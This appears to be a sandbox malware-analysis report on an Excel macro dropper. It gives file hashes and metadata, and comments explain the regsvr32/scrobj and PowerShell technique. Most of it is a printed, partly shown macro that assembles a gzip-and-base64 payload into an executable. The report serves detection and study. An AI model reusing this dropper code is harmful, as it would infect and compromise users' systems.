513813af...b4c8 | Files
VTI SCORE: 93/100
Dynamic Analysis Report
Classification: -

513813af1590bc9edeb91845b454d42bbce6a5e2d43a9b0afa7692e4e500b4c8 (SHA256)

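=UTF-8B2KfZhNmB2YfYp9ix2LMueGxzbQ===.xls (the name looks like a MIME encoded-word, `=?UTF-8?B?…?=`, with the `?` characters stripped; the base64 part decodes to an Arabic file name ending in `.xlsm`, which is consistent with the OOXML MIME type reported below and suggests the sample was saved from an e-mail attachment)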

Excel Document

Created at 2019-01-09 08:38:00

Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\=UTF-8B2KfZhNmB2YfYp9ix2LMueGxzbQ===.xls Sample File Excel Document
Suspicious
»
Mime Type application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File Size 36.79 KB
MD5 5c3f96ade0ea67eef9d25161c64e6f3e Copy to Clipboard
SHA1 524f2c9f62703027b1ebbf1fc16a4a7506d6ff20 Copy to Clipboard
SHA256 513813af1590bc9edeb91845b454d42bbce6a5e2d43a9b0afa7692e4e500b4c8 Copy to Clipboard
SSDeep 768:+Vp5c6cJjgv820s9i3FwEUddPwZS9BAgVx6SsfG2f/:+X5ncxgv8KWYGQ9HYSUf/ Copy to Clipboard
Parser Error Remark Static analyzer was unable to completely parse the analyzed file
Office Information
»
Create Time 2006-09-16 00:00:00+00:00
Modify Time 2019-01-08 06:51:21+00:00
Document Information
»
Application Microsoft Excel
App Version 15.0300
Document Security SecurityFlag.NONE
Heading Pairs Worksheets
Titles Of Parts Sheet1
ScaleCrop False
SharedDoc False
VBA Macros (2)
»
Macro #1: ThisWorkbook
»
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' New_Macro: dropper routine, called from Workbook_Open in this same module.
' It builds a PowerShell script in str from the concatenated literals that follow,
' writes it to %TEMP%\WINDOWSTEMP.ps1, writes a COM scriptlet to %TEMP%\12-B-366.txt
' and starts that scriptlet through regsvr32.exe / scrobj.dll.
' The quoted run assigned to $content is base64; its "H4sI" prefix is the base64 form
' of a gzip header, matching the GzipStream decompress call at the end of the script.
' The decoded bytes are written to $env:TEMP\OfficeUpdateService.exe and run with iex.
Sub New_Macro()

Dim str As String
str = str + "$content = ""H4sIAAAAAAAEAO19C3gbx3Xu7ALYxZtcQAIoiRQhSpRhvkRSb9myRFGSRVtvUi9bMgOSEAmLxEILUA8/aDqu47qOU"
str = str + "jv9nNsoTms7bpI2L+eLc5M0yZfk3rapb/Py17wbqW6br00at2mb5Oa6Saz7nzO7wAKkFCXp/ZrvfgWN2TNnZs6cc+bMmTOzA3nPHY"
str = str + "8LjxDCi++VK0J8VMjPVvHzP7P4Rpv/OCpeCHx+2UeV3Z9fNjSRK6YKljluZaZSo5l83iylRrIpazqfyuVT2/cNpqbMsWxXJBJcYdP"
str = str + "Yv0OI3YpHvG/bmuMO3ZdFiwgp3ULkkQlK3FcvIEnh+7TNHcGq5FuIyhONGS/4sfVhIer5v8qz/ODPb4DuPiHpdmvzCPlpIcJ47H6j"
str = str + "EI3XoZPyB/z5XVk/8rtc+a5S9lwJz29N2XLlK3y7SLyuyypao8Lm7WkhiRaq623Ff11WdtIclbwSz0zr3Jx622rZ/OgF+dzFTXxi7"
str = str + "LAQ31krhCL4O59GrvmJd3uZPbQ11GAi1N6h6RdbLWQLJvQe7NASsxhSr1XnxvQAoyePhnTtTbneL8xQhQ5fugn9zzRIGLrXkheaQb"
str = str + "g1YaGg8KzVirT5XDqGkjRMWGtb0u0R3TYf1o0oTRugb60mCLWCrTO9IJaOA0wvoGQhkpWXPSsvizbFNoqODuEBqCzp9omjGqvRKLa"
str = str + "AerCYQO2QBXsthBNxvX2ZX2/ONN9jJoF+Ke6P+dMNRJM6ChsQJq4b+uKeb84kqM8gibIIRZGZZchv/DcoJJ0gJGh7uSS9mJTRN7OK"
str = str + "6oNxzboVXc2QjaeXoIgLrNsdYdLoV5vl1i12FW12BWWXV1Ncyg1l60PVrZc7rcnECiZ0HOw0uH0F0XGHpA9a2kous0HqYbbMvaSFI"
str = str + "fEmj87SwyU3ZZuDPeEEFyRmSQOX3vXalSsVzuMBphIPGoEZEkJ2PTazhAwjwY835VjVF1c22mYw00y9XXy2NTnjd3T2bGvDzFJknm"
str = str + "1d5H+2dTGr8NnWJazFZ8mgglKEBuozeKmlzAR61yJGgDUYcKkjagRduuj+RST8059duSIRl1evvPQR5GyOK+wyr/70UuKrnlrOGFS"
str = str + "kETOJ1rgv7mV7s0wat2ZSkMb1zBQZ9vkyl/e7sPeXseMu7CNl7IGAdYEMK0U9sS3MIfwOp/LGL2FKBKz3OPWtjxMjSyqNNnwAFebr"
str = str + "vGNDwPoMVYasWsKEQoJmC4m5wBndzrPWS6gQDwWMkE0tGfe1Z+YVMDGfKB1rA9YNiigk08upedgImxi+YEPvYiOcNFupy5XU4ATXu"
str = str + "cHuwquxTu+Hk/MampkmMRf/9MqVYopsImJEtPvXUJGv46gRuZdA60kQQFW4lGDSbHPosvKs9yhzhZS0ZeN7CbY+otg8b/rAT65cMb"
str = str + "wbye3OJZm8sJxNu7nr7WY7eazExVg03UFuKnkxVichm7ARNeqOxutj9enOmi7dPaehN+1qhWaX07L9dYav87jh7XRknsvbr9iDEZm"
str = str + "DT9dRy9WyyWo2r7KafvPfoaaIjZdUVjtUVpd7rUZFHdTlBeYqZyzSWBGClzYyOa5WscCORutFMo0qaXQQ2RBEdWFEXtMwpFoRq1Ow"
str = str + "2EvmY+DjlgL0goZhriHDXkS8GOZaGqJLL7565UqFh7k9XHo3KvTtlmvOEXxfwYLQr8oFt14uv+IxHxYJPD+EJ5gWSRv/Y5+Mz9aj8"
str = str + "jIbT+vVxYCgWM5Qre8ptr+Q5v1eWtwXO6vnjxXyiUnrZ/xssBSVnossHz0T5jpi+KKUx1xPa177Lt3cAKAEh6eE/eZGwJrUYJff3O"
str = str + "QI7zdvogkRAJmkh6W01lfgS1cwSXTzZprNz1829Gk0USKBDi1gbgbuW+66qjWqVgnwEAmw6JoCOIzHvYY3fQsN/Bbi5iGU8dJiQmP"
str = str + "BhKTP7Kb7CEssX25xDdX8NcSlrWBftR6p4qvDUpPJdIDqV4wqZb2rIkkNnUv/rhOVK6hgeTywdWKqXsyEUEuVpmMFPFdt/Qlu3eqp"
str = str + "0s0fkW54htT/PB0lWUdxn+FLXrQ2EhmOEJJywbL6Kj1fOoCUqs2uZF/YcHH2BgYWXZxNM7D44uyNDCy5ONvGQOPF2XYGmi7OdtJCJ"
str = str + "6keAtVZ8t6XfkbxlHWiiv2ONhbe3Marx9VF/wy3faRa9A/+AmahedjdUFRWcTMdC2r7OaZVtGnoFCFqcb+hGX6OGK13XJXD6zKin/"
str = str + "hIig9Xa2CLar0IDK9KtkGo5YVgk1wIPHagW8vuHzHBv6pWSxO8RLNxoV6qhWeAQs36UUgK+oGHFfSAl5CdjFxkIxfPgKD3jRhZBWG"
str = str + "TjWycgYl7O3Vexdp91o/Jclu4XZNdZSnH7PNWaQ7YdZqDD4QrPTaHHHT4gYgLHXHQUcl5HZWB/Xab/eY6p0I9B0vz9ZnecdVBuHTO"
str = str + "Sxr7SbXGbvb8wg7SPUj3yUGKB4o76RFMxEMbHqOdQ2gHNIddlRCIvMVb8P0avjQ+d+H7+4r0+x2ouuEQ1UcodJGNz7yVOtmytQpZ7"
str = str + "q9D9jdLo4r4NOl1j7B0Ixt889H7F8WNlAYgY4pgxRpsAn+izEPgA9UEfG4CvhoCD81HIO8gebik//EnZ8nA2rERDLBEspWksnk+Ku"
str = str + "lqNsJuNsI1bPxUzEPgH6qQ0gBtAjMRZwbYBD4+H4F3imuOTJ1rZOqqR6Y9X0us9/g8GjFsjRi1GmnvmtO+sYJhT2vI3YSsb4SwFw0"
str = str + "ZISOQhkm0bxnHRoSnkBE0B2idvO3qHut6fBoicEyoJd4qnzY2x4PBBSNAL2M7JTZx8QGtovs5xcmLD+jlYqvVW1mf2PVb7dW9aon0"
str = str + "7eSlacLKZaUsoMrR+ko1meD12lqPljyh2eNaO6qzB6qyv7xyahBYJ/vuk0cz+/Edwvc5siPX+ckVfBFVil5otcUV8yXgoTJ4nvVU4"
str = str + "9dh1i0E7nZ/NZ4+EwH5dfDxblVg70ZnZYbqoTOT9qCWPBrUVLaMXjURVLWLbYJiSVNlv4VYktRQtTZZx7zVmESQc6GZqNwc04Nhnk"
str = str + "o99TM8JWmjnOAyYZ0AhYQciZXsueQxh48OJQjydSR42rAZS3Q9zwcPPxmNQLRmOxhNzsYo4qBtY5jmDuceQl9L7MXwgXhlpUn64dt"
str = str + "V+HV5OIClz0PP9B5BpzTUtGNPeq+Q8VKiwdzHoHUJ5Bqvn1zrEsNn00zvJya3W1t8CIioknXAdw3WrA/6eNmZj72AbcYh6y9Ribc4"
str = str + "1hVAAbmh53ylpE4ThTo1fYCKDhKiCQhdVh0k6w3qM93Ue2UmBThGimuXT+nWKs2eZLp1rwPGvbIeTMZwwGTwsrEyEfR2BDgaRuOuy"
str = str + "1BiQOuU4XHbjObYgVQFGmsbPwt3pPNIthlam+izD1lpvfwmLGOVKueHs8fZ4uE9ktEedB2/JGmwdD5Z6/gOPzq15Cxh3VvvjlCCcZ"
str = str + "deUynGY9e5Srf+GjLVC0+HX03DXDUy50QoEebjPvu07l9oAsa9ss1KPo0KVB9KxX2VQ5245k0PcRwQC1rfI40dIk1zkR4TPMYy548"
str = str + "prlxA5efK5qD7gGsRH3DJM60GQ4NBGDqswfCTaQUQnMG+WptgeEvtw67mgPu0iw+36LTLdYrVbGCWxr2V4TC8zcFbll6h4yo+uboE"
str = str + "xQdmKCDgcJBFjIeSIY2zR23dHeuNJUISpvVFO4YqYVUzQnKqhAEdDc6rrMjSq0roPspbdFU9QgFuRUIVbk2SUiJQihGWWdZEPJqI1"
str = str + "7Gfitcb0drTNuDqXdsCx1K+TN653vqBVrXMLJn3iMqXjNe1F36B06sGUL5Rr6LMNDrmPU9LoPZAdW0PasuZ5IFsRt3GFRhC/8Ztr1"
str = str + "25cjkpJag5B7ksJLoyz+h84VXYyzIPz7HyPKO9Gm0BrbPok8MFGWGWI3HrXt0+Cgxy1BuaT8aN46jPvnTjCUAeC8u5XbIHeecklzs"
str = str + "hI2iSRmBd0KXra5Suz/odzi+xhzKs+uWRXyTAB37JLa/QiT+PrZzvcbkboOM+f/sNhjdg+OV5IJ1pNdQc4cW9hh/zwW/4JbneL6JB"
str = str + "4lr13aWuEzJaKNKYNe3JY9hm+gzdPEzYQCzArwbiGuOOODXpBAuAJgFMQgl40VRGbrqhOYAdy+nx4KUxzEG556ng9vvmP4Xd2KxWa"
str = str + "b2z3sMHlrLwHRgC62M6ncGqzhksHaKScXUuqO3jFS85wYhUbBTVrnZ2aQd8cjzq4vWJuLGB4+16w7gYjxkxO4T+POFiiWolGbFkNU"
str = str + "KqPG7EGmorLpqv4gIjzuQbeqNG3GryO9MnLO0imoxH2ieMOiPeXJ8+KujNTXX7OiMCW4gYCySVVQG7XftqNFrwcxoZSOmIsP5NuS1"
str = str + "RzEWXsjsM3airKPP3Md30WMS1T9GNqAO46lG45+GDdEnloDwzX6gaC3m8WuVghXV5AMXtpHNY4EYRqQ7qcmZhFa7BU2U3ZY+16TnF"
str = str + "LqjM5U2P18zg4C8yg5f73TM4nlCNhDS4pJG8isHdqzqTejHq1M61BqNBnqOVA1FCOdNvidFgLKmZfosYd0TWTNZObXTSICdgg7FIA"
str = str + "ouMxRJYrBsNzuAscoDFFU5fYs1UJtbraWL1QWJN2kejajSmjxHUZDTZbybml/kRtNTLdWpfOBAzlbp3Ui/70Et8qWostV+CNBvN8i"
str = str + "UI+0SjeX5K7sML+1VDPOUe2zeTQ+WZviwRb5GjsDwRX9G+y0gZKy5aj5Ynlj1BlmGCUEms1d7LLTdaa6fJcqMFE6TFWIF0hbFiUc+"
str = str + "HjJZOTSL1WEvVZFjmAMvLAl+ecs+nZbqRSlysFO6vUeXlLbWIrpW8ULW60NXwx8swaguDtmvldZLuK7wba+Ln8O2yz+jpfXNE4Vfy"
str = str + "BqsoOPdod769aEiXu9FQ8Q6k2MfciUdzV/o4yX8CicRYT5CS7yrnk+awC35dGU6YGRd+pNL+A34K80eJ6hhjsySb3zxJmHEkQc2Og"
str = str + "pf5zYka5JLXVO9wh5+dSORyuxfgQgZTlxvjXm+5xDBcQQbUprUFSG/yffpa8dF/Eo1y7+kRdNUhQHvKGdrU39E8ducp+626Nrlcqv"
str = str + "nY1jtyYT3h50AxHFPZJmKedI44D6CLP992Z0RvXmDeTTZ+olMPqKeOBtuDeBxLn2LuUeme7XcEtVx6UvCWm+8kYOTpKomRnqJKVii"
str = str + "A/aplBMrbUGtPBQ5r8mKC33qQqrXX+W2EZj1CCL1N0rwbYx8qj306T+NrkioKZO2+RFxr34glX7tIh87maUL6Y/7XEo10tkTqsi4E"
str = str + "nBOfIGqwBtujBvbkCAcQLbwp1/sp610VxviEJ8QihLm7SDrEIUPzAtsPa67z3YDrWFd3neb6Xce2hrfqgPbqB72u49prHPVWDm+ve"
str = str + "jbrPsCVZz/2wa/hoGPyzMdGx63vQwFy2WhbqtLtDY2eC+gp+KzikIfvvRi0cZP3M5J2mOKV+7fVtJpV9mc+eddAU6+6TdMuR+QFh3"
str = str + "jo0v/BMlS1a9Ob3LuXBtq90B7MtTmzNzNL7B1Zo2tDVrn0wbuyla4rEP7aixzMQKCyTXPXNfyVexKd3xKVSwzxgBFgTbOxyFdf7DD"
str = str + "Vyx82Auzi+XV1Q+V1NTWBoHXgcqXc94cuqcgsmSNn1UWLq6oPaqjendkKkTvS2p0XIk7XzktPhjaco9PdcIVVeikv365Ld20B2rSN"
str = str + "Ks1Bd5wwIlIy68cBBzcw76Zs9by3I5rmvUmhJyIb/laQHThdpotEedW8lBfNG4o/IeaPtap2h5X9XqPTEw+RcwtAM6Jwdw3VZc69g"
str = str + "Lqg35FebvnkXaRI0jXUXkPukNjrdBqG63xkYxgbR73TE+jUeEDa/G1GiH05r4HdommPiMh30z8Ru/oVhulMkU7YI5U1MJQIb/hroH"
str = str + "Q/B2CRQPPEsR10jS9B55pCXkuj99fw4YIu/b3BXl/32u9KNvy2II98JWBfVgpueCMjmG9GtM9olidYzhU0eXYucyOapVfKhjQrVMn"
str = str + "t1Ky6Sm6DZsUruTaNr5TZuUbNSlbKohoWoXIkE8R+MezXeZ3cshCBvtZGelCUn6OH7l9KD0uCNXpoDrr1sLxKDzcE3Xpor9LDqio9"
str = str + "rK7Sw/oqPdwUdOthy/XrgY2MbGYJ1scB+JAo9OFNpWBBPfbpPAdhQTVxka/xScv7A8UO9UN87BvGdOugwCpw0b4BZZ+vyU3Z6vT8F"
str = str + "6n4NMLwJhPSsfja16RLZPjT7O25TeJiTKt4pnlbGT7Xy/yFmtUP6bE35zBKvoCJa9a+WqS7VadZYTa5asTwypcy3pDhm/e60CzV5i"
str = str + "aVybjycttKlpwLr37z8RLtrAPJo5GAH5vOv6D7bBVFdbXIhWOe5t6GO7h9m87MpcNUTc4ivrlBa7E25/1Qm4qhab+DxoVCGtcrqG3"
str = str + "craHbapxHhfp8KnQjHSl6n75a7+W4MqB0rVfanBic3pfUUWx3BnVV86ywL3/Qu4qHat9eBC8HpGI5VhXOvc90WgSce593yvjemKe1"
str = str + "1OudFzajKt1ubdB0VW+4Q74daK5PY0oHnyrfZP1b5kgzz5Mfpn7JrYYvC3+l3/37K/3uEXzW/R/Qrxa+7Fu5QPYkyn3t3Cl8si+vS"
str = str + "Cm0mgmjeI+gU4R7aRTuK4PWnRgc6zQS8/4K8gLyM3Tpw418hpBtNUhqOdNejWwOW58kgjPkAx4gH6DVdKPV9KDVENdq6M7QTRRLCZ"
str = str + "GtzAqKjB9EqrO6rVDIOSut2fuy1dYcHfCL2kp2FuupV94LdvZ/9GlU5NdT3v/5BEUFcUePHG0FmQtphiFbH6vBjLUPyQxRZt9pvt6"
str = str + "tmWGUmQ+R4VJj60FkPdbbQvYJK9MKt87QFRy/+Rs0WVrNh1n71O4NrEydCyJMICB18KFfQQdx7+XgSn5pAAg+vK1iR1/5CtmklP8f"
str = str + "/p/I/1nK2kLTVSKPdcnRhfX6sCj4zUf+k5Tg6OCb3wQtWwfYotP9vKvNpasJP0NXq1TrTWFnlH+zrD3pMkLkMqjz0GWhu/Q/OAiPb"
str = str + "/dNe+qF1X076py5Ngv3z9W2w9JzDkvWV8M0uVjZyRB8SsJmpczLyZMVn/JBGdtIXiBDWRHaHL60a/Nl8/Fth48QBpa0E2aG/XJgb4"
str = str + "788gMbcVQbuSxc5xWGePKdjj/2iE8q/D7ESIn7v/neYDJkHx+NRSpHRldc8FPRCry+rgJfdsHT9Q7MVysRoywzfPJyJS3Rzj6f19Q"
str = str + "eLckBEyrwrcmvXl5o+PjaJJ0OdNDbAXlz0mtUjjE2GPPeiNgJdNhvfd64msooDglreT/v6e52urZ8sTLpSMA6FbtW84geSD+KZ7nx"
str = str + "vZXGca+tvA/HKsp4MVarjBVuZSDEQEDhFqZaH395FX3IV2J2ZWf/oiLC7votmioE55SeiwrDNIcet8+GrL8DQ85BnPXthXbUG3Iwi"
str = str + "YSNCad/i5h6jGwxmX4jGewFqrALFZLmmwh8DqD1OSQ6G6Kc4Ijng7qWfpwqfCdhv55PP0EauGzMeVVX/k3KzIwwaL4vVdNvJpHo7O"
str = str + "kx+dsno3xpTU3KS2sNSXlpbUNSXlo7SE++KcYv8BIX5dUDDi3pRkHz0ll60ducmqV3u4tm6bShedGsXq5EcZ28mJXkX+7wQM6GOE8"
str = str + "XO5rHZiNcha52OC92+dYnsVOw2TlnszPDz8XWb/FzifVmfjZab+Fnk/UUs0ubAOudSfviqLwMJa9zNAdn6aKE9X4qpCDT+h8ELeRq"
str = str + "Ca6W5LShzOqisijY83qdQw3ry7bCvm5z+C2bw5dtDr/NnNB7a+s71AW9ybB+SBC947C0BkC0fyiPwHkhCQYbJEGtQRKM0nOWdh/X8"
str = str + "TJ1NiWcH5DM+wsbhlZwndZyfmUZuqEMpcvQjWWorQy1l6GOMkQLLbvu2S5irrx1CtqHObP8E6IYyd3NDPSUFUu/q2q7S+X79arrqr"
str = str + "uXo/Ztg7dtU+xrSfT7tDNrurq7Vnev7tkoeKc7ifRpmNZyrAxhGNanUWn5YMnK5ceLVONzGNGbweLyQ4PC3yN/v7f81kMD2/FsQP5"
str = str + "L6Gb5tkk6+hZyfgvlSJMqArTZ/ndlNS1K1Ds0zb8TBGt8J4r22vSiw75zz++/qZ5H0rB/U/hxr+RcE//o+YhfE0e8lC71POyvE1+j"
str = str + "nZzY6blD08TnOX0/p7d4KQ1yupzTE4zv9fwu2tZz+gRjznniPk1MBF9DeiL0CFj+veA9QbTVXvMFxVO+CWBmtYmAJuLKq15N/JlGN"
str = str + "Xf5HwFmoUp1IsGH/UGxEK2C4kS4Gemk1qNo4kcq8ZnxUf0PMf0fcZpW/wA89+vUVoSJ/vsClH5JpbRBp/Rx7vGUoPqdKqXfDVLvFw"
str = str + "MEv4K2UYR4PbombhJ/D2rLw4R/3keUf0d/GP0azP9l7WH/Q+Jh2ryJKZ1K7+F0GdN81kd1dgeI88fCLLXv+ZAmHvMS/mmN8HfqhN8"
str = str + "fJl09Fz6Gtjdz+n3QF/aZCY2awmP4bZ8Z7OOcB86TcH3YHaY418q5tRh5Q6wLjXsMsVSboP2Wn9L/5T0FzDc4jeqUvsrp7woq/YKS"
str = str + "p/o6pf/sP410cYhK2zj9Ftf8336i+XGF6j/L9X9bUDrJdW7xEf42Tj/tI8xTTO0jnPaFiObjQSpdoBOdk8zVCKdf4FZKgPBamOCPM"
str = str + "f1h7usop+9QKb3JT5Qvhwj+DqdbmabJdZ5kagcZs5PTp7yUvjs4jVZjXGd/gNJ/8RL9v0QdTTykUDogzns08SS0sT9FGn9CLNLu9y"
str = str + "jic3buBe0hjyoalsncB3TK/fkNMvcOvR+5V3pkrlV7xOMVC3plrhB+E+i+d43M/Y7vLZ6gWLBB5l4Wb/dExM1bZO4bvuc8dWJiq8z"
str = str + "59BNKTHzbzvVo9ypxsaFP5l7j3Pu32e2UVuxQ/rud+zRyC8Sn7dxXYBULxdadMrdbb4Wr2HWrzD2GmklxdJfMeULv8TSIT98mc/Fw"
str = str + "q1gi6m+XuQlfq2gUv2nnHvd2iybxQzt3IviQZ6m4eY/M/W2oTSC31+YMuZTYuk/mlqK/FvEJO7dL/5Bnudi1X+ZuD7bCWzUckLlbo"
str = str + "GtY8yDl3iJu1Cn3Xs69oaGAudcqXuDcEw1n/HPLbj9MuYcgG+Wqy2gmbQ1QSpe3VYw3weMhgv8iSHAhTPCn6FqJiFEQIN6nEP6zor"
str = str + "5eFaeReuxWn2Uv+l1yxuLFEJWuVam0nzFRndIvhyg946NUtrrfT+kXmYdAgFo9yTQf81VKm8KV9GtB6uWtagXez/xUpwFsGRXYNUm"
str = str + "5CGlQ3Ii0XvRwupHTPk4HOD3A6TFOM0gXihzDpzk9z+m/MrVXxXAgJRTlBxi9V8VhxJsBpdPXLQylMbBOvCS+H9ws3so13yreE7pL"
str = str + "LFIO+cZQ82OYx6+K94VPcavTSHeADsHnOJ0Ry5SnfG8ArPvHxKPiFd8F8aCgtsuUv/e/Wfyh+OvgU0hf8T0tepRnvGNc/51io/Ljw"
str = str + "PPiGfHHgRdEn/KK749B4eHgZ8SA8rL650hl7z5tTHxM/IMyJg4oH1a/KI4pBf+XsX8r+L+J9Khaj/T78LuPisXK3zCFnwEe8uvKZ8"
str = str + "SngmHlg2KfOoY6P+M6L3jrgX9X6Hnxovi6Ct+v1AW6EWMf8i1UXhUXlSWo71eWKY+KzTppbKO2UjmtLAt3KiTpFuClJj/se0qcVv4"
str = str + "uuAOYZeEDCtU8rCjKY8ETyoPKd7wngckEDyuPKnn1XsAP+h5QnlBalIeVt7JcJMujygHl+5AooOTEcwrJ+4eo+aeBbyN9wftdJaBM"
str = str + "i39WSIc/VF7ifl8SX9J8qqK8yxdSn1HOhOvFM0pGpXQZxv0Z5Y0hSqe9lP4TYOIhhpq9wXoe3+eRng81qB9TzkOfL4k6f4P6GWh7p"
str = str + "Uoj3qm+qDzo71WhAXgsRZkF5y8pFzj9b+E96jeUPaEh9RviWPgO9UHYQFEdUCh9SXiCb0SqKE+Jv1HeJp5U/0ZpC7xNDSiPet8N+C"
str = str + "7f+9UnmP8nxNcC/1P9Luv2uxivF9V/VRYrXwRGlq4OfA317weF74of+aj0R74vou0nxPeQ/h23fQVaIswPgPmAoF6mEeEo6q7wcqR"
str = str + "7YC2Gcip8oyegfknv9hjqjeG1SN/j3ewxlE+E+j0HlDXhAc+D3KMqOsVRTxRz6w54/T7AqtiB+CcqsmLY48dMGvF0iZD4KNK4+AzS"
str = str + "JeJlpMvFd5G2c7pahL1diC1iSPvFMqS3i5uQDjL+Tk5Hxe1IT4lppEXxeu+ouBer+EOcLkarvxcjSkH5beX9yk+wc1qvblaH1XPqA"
str = str + "+oT6jPqC+on1JfVn6qqx+8xPN5Z16V5/phBUfkXJfDZ5/kcP6txMgKpxv0J/xsOHmjBi++j4ibo9Sblrfx8mTq5+ZbR4eHtuWJhMn"
str = str + "O+fzJTLK7tHe4WN09k8mOTWeuWkWHKzVOnRwzsyE9PZa3MyGT2dT2if3DFzbdsGB6eNEczk8UesSc3aplF82Sp60guv7pXDJkD+RK"
str = str + "eI+vWSLhnnRjPloYPDe3cgPXIHJuezN4ipovZvn5xtzmCYJpK+wb7BwbE4PliKTvVNbBPbDfP5ifNzNj2TCkjDhXK4BglU8VR05rM"
str = str + "jVDLEoL12xCBT2XGc6MOgX5zcjI7WsqZ+WLXrdl81kIR9TIwxo/+acvK5ktDE1Y2Myb6xoAdkyUDxb5SKTM6kR2bj9RgITuay0zm7"
str = str + "kHxydxkdjg3JqYLYCk7fJLggmWOZotFAkcnc+iBoIPoY8jckQfOnJqCtgW0OZK1hkvm8FnTogpQ92hWTORGrNwYFJQVoxiV8eww/Z"
str = str + "sl4px8WNkp80z21ow1khlH3UzRAXP5YtYqOTkSYg94IPjWbGlH/kzOMvNT4OVwxsrREIrKaIoBGmuzyPAgFInHTsgl+iGtiWduqmB"
str = str + "aJWIAgyZK2WIZpn72ZqayougGqDFn0PVBiGpOlTFsAuDUKd5lFksMsyLzBIF07mRuNEPKHi7lgDli5UrZ3bk8+j5fyFaGxAKLmUJp"
str = str + "Gk8pQVYMWef3ZywAxRLGQ7aEHFMFkLfYBoAew+hauZFpFN06nXPltmdHpsfHSQ8VHBofzhVzVbi+YjE7NTJ5fihXmhdtZcayUxnrV"
str = str + "KVoKGNB9J0WBMRon5rbhjR0OGsVIfTcQgzEydz4tMU6mVu8PVsctXKF6kIpNLc4mJ3MnGOoOLfxfgtDOVqar9PCeSs3PjFv0VQhkz"
str = str + "9fKTg4naeRYnwpN5KbzJVcpUU56IMT2cnJHeeyo6wQc9t5PCay52gGjBA8PjYtDeRwZhLQYLYkgYNs82L73kHwejdmYVf2HMwklx8"
str = str + "+PZ21zg8XMRMx8c+5swP5sey5fSdFccI8O1wYO+kYjZzssHHY/6jJgF1ii9BlDwKV7LTMqW2ZYnbdGnkaIE7C1WVtuGRNO+CQaQMw"
str = str + "aBuy5SpWcjY4OD1iQ2czOfJaAm5WAnsypdEJSieI0E5zcixr7acc6WR3Nj8OkBrtNK1D8Iqjp9iVsF+YpBP0rMUaFvvlP4AkPRlEY"
str = str + "/0zIEXFJMlNCTkxxTYTMzyTR7e5vACCHpY5nR8btswRwLli3xhULW4zkRTRZpt5bseZDKlI8mXKmVpWY/ak7SgFzWsewYrzlDK68r"
str = str + "eir4IrfyQ7sgsDlLVcOGcMh09O5yVmx7nRLJs7szBYylilgfxJkyQnz1tB2B7s9ux5zk7JB/QxOJnNFkRRpvgyH+RPuS3Aov20xYL"
str = str + "3OS36oSlL9E8gGR+zBLltGmTpyMWuUqlwMAsbLJakCAK2kM1MHZSZoey5kg3aC4gcYdvpAKAhxaOUKZ7aJZdjYS/LrPgRUnyOFD88"
str = str + "auZLlkkF9hpGLhVrA3eOUpgy8ttyJch/BssCMnfnSvRAvTPEjLmb7MVRX34sY43tsCzTYls5mB3LWVB+dYlcgYaznHGCgRJgXmDKu"
str = str + "bxZGoZG7VzXqEz5AcMXfSNFR6fbc5nxPPx/brRYOwkHSACzMAhucxjR2mLHoZfLpQ4xiWjdLEorw1OuUkXBjmEIa0exrKQS52hA+i"
str = str + "YnyRUV5WJRzkEqCciwgw25KODGi2LH6Wk4ArE9XxSjmfxodnJYTpwi2VuJAcfdYNAxJcanJzPWjnMFC8ZJXnieqEJIxzFIzmBfQaL"
str = str + "QEE7MztBQsZVKkKywaMcQEiONTsIHs1gOERG4cYPTozQ5SDDbauzpIgb2I/gh3hy+9mZLXYNkjaUiG0SfNT5NwQMIjZm9JZEZHS4B"
str = str + "nIL5C0QwJDa8gBjHF85pCo99I+SoXT7bRVqwkJjESOxpBn6nJ0s0+/s5YhJnsyPDMngSruDFHbaJUftJnoEmRLmczF9IR8+zWdizA"
str = str + "LaHMMZlDEMwBDi4YYpopC/Yn7XsKcwLim0stl/cnQNYYrpFhjlilZrjfJ9lZc4zNEmJ7Aj2ak6XqmbavulSAaj5pppdtAcL3l76F9"
str = str + "pcdlS2T87IFZ9B/qfcxseGp2kFZYChae6gH+yWsntNROVj5llpUrY8EI8ycjkiR4ZlCp6BpRD7Ctk81ip4Tp4k8jkOsazzBPOcB+x"
str = str + "EBG5d7MxM5YCh+EHqgBk5grAH/WxncU0gB/ZT8MdUnEhQZpx+hFkY5qmGYELsmCogFSJSFCWxSZjiJP5EpCDGKjm9T+zGn/D0ChEY"
str = str + "wq5vD/3O2TiOOib2a12Cap+kzRb2eCLQBUrn8BWRTnFIODkltEMcxN8+fEVgL0okzQxyGSH/hC8DemLhcez80uK4OItd32pxv7iR7"
str = str + "ubrNtW6FrusXeJ9XXTqXzeB9mewF70NPI0IcagPPI0JCxjMNchCNNvRMo19ZgZ72ZPYw3aKnaIb6UZxAj11iw6xBr1tAtwDuJd7lv"
str = str + "AGhpW181MlTbSDl/mfYv38rdagxy5Q70FPXSyTu9WN0ENtuxT+RGgcecwvlAhPN7Q8Cnny0FuW3rgs6+fcDaiREtOAxpG3oJGMoHZ"
str = str + "dGIe7sLvOoS5q+yL0htQTwZeeoN45JCa4R2wGQYG0WsRzBJgsqKXstlmUQvft7t5OoiTPrUpVNAbEduq3+S5ItoJrUfvtGKezqD+J"
str = str + "Z4Zl6SzXyYkp2JQJGpiyeGIfyG3EkUFxHm3gKWELKWCwOnO9FPedqmqZ5d6nXO27kD+IPMEp1sko5IEcHliQ7zjZ0RJ3fykhR8CWN"
str = str + "i65OyeGbargSN8HG9qJsqPgFBtrzI7NwsbpQ+Io/WsAtlT9TJNGw91HEfZPusgTtSXVOjoEWcr6Mdw54oj4KTGFUoUfYw4meRfyE6"
str = str + "ztUe6HqI9D5vvw7eE+R3mc82wh/VV1OsAdtZ+kf/3Rt0/cDvu7C7XOoZxmeEpU/kTIBev2k166tebQ2t13SqwCNAkNEGfYspMWjuW"
str = str + "5HxN/p1BSgMapHxqFTrb3KcAmSkrQMM3W+7nkNOd6OHcvz9ku22tQnuazkvmPotyJ59r5ejDG0X7ctjGSVAz/x0mTYR9b0+OydWK9"
str = str + "WActyu8afEeBWYvnanzhAdsHWK85toIUKE/zfDnPM3WaPQbxQaMi6g6US8nLiMiQbUWcMw5yjuzVxtxeLcF9sNQ8bCNvz+mUkD5J4"
